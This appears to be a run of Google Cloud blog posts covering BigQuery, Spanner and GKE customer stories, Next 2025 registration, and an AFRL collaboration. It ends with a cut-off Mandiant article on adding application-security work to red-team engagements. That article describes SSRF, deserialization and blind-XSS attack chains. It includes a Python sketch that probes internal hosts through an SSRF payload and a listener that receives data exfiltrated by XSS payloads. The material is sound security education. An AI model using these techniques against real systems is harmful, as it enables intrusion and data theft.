At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the world of data lakes and warehouses. BigQuery’s unified data and AI capabilities, combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simplified, eliminating complex coding and saving valuable time and data movement costs.
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data.
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools -Thornton Craig et al, December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improved our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced recovery time objectives (RTO), and improved recovery point objectives (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week. Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
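The read-verification step of that cutover can be pictured with a sketch like the one below. This is purely illustrative pseudo-logic, not Current's actual implementation; the client objects and method names are placeholders.

# Illustrative only: "legacy_db" and "spanner_db" stand in for whichever client objects each store exposes.
def get_user(user_id, legacy_db, spanner_db, metrics):
    legacy_record = legacy_db.read_user(user_id)    # legacy store remains the source of truth
    spanner_record = spanner_db.read_user(user_id)  # shadow read against Spanner

    if spanner_record == legacy_record:
        metrics.increment("spanner_read_match")
    else:
        metrics.increment("spanner_read_mismatch")  # investigate before cutting reads over

    # Serve from the legacy store until Spanner reads are verified, then flip per service.
    return legacy_record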
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data per day and processes bid requests at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem. The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads that are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable autoscaling for multi-host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.” – Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to help businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, and problem-solving with our top partners, and seize the opportunity to learn from top experts and peers tackling the same challenges you face day in and day out. Walk away with new ideas, breakthrough skills, and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt cutting-edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings, and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks: delays in moving and sharing data, limited access to US-based tools, reliance on standard storage and hardware, and a lack of the right system communications and integrations across third-party infrastructure. Because of this, cross-team collaboration and experiment expansion were severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run, to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process made it challenging to provide scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application on Google App Engine, integrated with Google Workspace and Apps Script, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was a significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud, utilizes infrastructure services such as Cloud Run, Cloud SQL, and GKE, and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, the app provides personalized insights and recommendations for fatigue interventions and predictions, helping improve cognitive effectiveness and overall well-being for Airmen.
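As a rough sketch of what one such analytics step might look like, the snippet below uses the google-cloud-bigquery client to aggregate a week of wearable metrics; the dataset, table, and column names are hypothetical and do not reflect the FOCUS app’s actual schema.

```python
# Sketch: aggregate wearable metrics in BigQuery for readiness reporting.
# Requires google-cloud-bigquery and application default credentials.
# Dataset, table, and column names are hypothetical placeholders.
from google.cloud import bigquery

client = bigquery.Client()

query = """
    SELECT
      user_id,
      DATE(recorded_at) AS day,
      AVG(resting_heart_rate) AS avg_resting_hr,
      SUM(sleep_minutes) AS total_sleep_minutes
    FROM `focus_app.wearable_metrics`
    WHERE recorded_at >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 7 DAY)
    GROUP BY user_id, day
    ORDER BY user_id, day
"""

for row in client.query(query).result():
    print(row.user_id, row.day, row.avg_resting_hr, row.total_sleep_minutes)
```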
Streamlined AI model development with Vertex AI: The AFRL wanted to replicate the functionality of university HPC clusters, especially since a diverse set of users needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and persistent, active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build, and more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources created a flexible environment for researchers to do model development and testing in an accelerated manner.
“Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.” – Dr. Dan Berrigan, Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters and gain a deeper understanding of their security posture. While most of the infrastructure typically receives a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the application inventory and identifying vulnerabilities within the components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators perform most of the remaining activities at this point, the AppSec consultants stay close to the engagement and often step in to further support internal exploitation efforts. For example, applications that are only accessible internally generally receive far less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve seen a significant increase in engagements where our Red Team gained a decisive advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
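To make the reconnaissance step concrete, here is a minimal sketch of harvesting hostnames from certificate transparency logs (via the public crt.sh JSON endpoint) and probing each one through a full-read SSRF primitive; the domain, API endpoint, and injection format are hypothetical placeholders, not the customer’s actual systems.

```python
# Sketch: harvest hostnames from certificate transparency logs (crt.sh) and
# probe each one through a full-read SSRF primitive. The domain, API URL,
# and injection format are hypothetical placeholders.
import requests

DOMAIN = "example.com"  # hypothetical target organization

# crt.sh exposes certificate transparency log entries as JSON.
entries = requests.get(
    "https://crt.sh/", params={"q": f"%.{DOMAIN}", "output": "json"}, timeout=30
).json()

hostnames = set()
for entry in entries:
    for name in entry["name_value"].splitlines():
        hostnames.add(name.strip().lstrip("*."))

for host in sorted(hostnames):
    # Hypothetical: the vulnerable PDF-generation API renders attacker-supplied
    # HTML, so an <iframe> pointing at an internal host acts as the SSRF probe.
    payload = {"template": f'<iframe src="http://{host}/"></iframe>'}
    resp = requests.post(
        "https://api.example.com/v1/reports/pdf",  # hypothetical endpoint
        json=payload,
        headers={"X-Api-Key": "REDACTED"},
        timeout=30,
    )
    print(host, resp.status_code, len(resp.content))
```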
Exploitation
With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. By leveraging the Wayback Machine on the CRM hostname, the team discovered a legacy endpoint that appeared obsolete but was still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
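Blind XSS only pays off if the payload’s execution can be observed out of band; a minimal callback listener such as the hypothetical sketch below, built only on the Python standard library, is enough to capture data (for example the page URL or DOM) that the injected script posts back.

```python
# Sketch: minimal listener for blind-XSS callbacks. The injected JavaScript
# would POST exfiltrated data (for example the page URL and DOM) back here.
# The port and log file are arbitrary; this is illustrative, not Mandiant tooling.
from http.server import BaseHTTPRequestHandler, HTTPServer


class CallbackHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        with open("xss-callbacks.log", "ab") as log:
            log.write(self.client_address[0].encode() + b" " + body + b"\n")
        self.send_response(204)  # respond quietly with no content
        self.end_headers()

    def log_message(self, fmt, *args):  # silence default console logging
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8443), CallbackHandler).serve_forever()
```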
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application. The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). The Apache Software Foundation assigned CVE-2022-46366 to this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
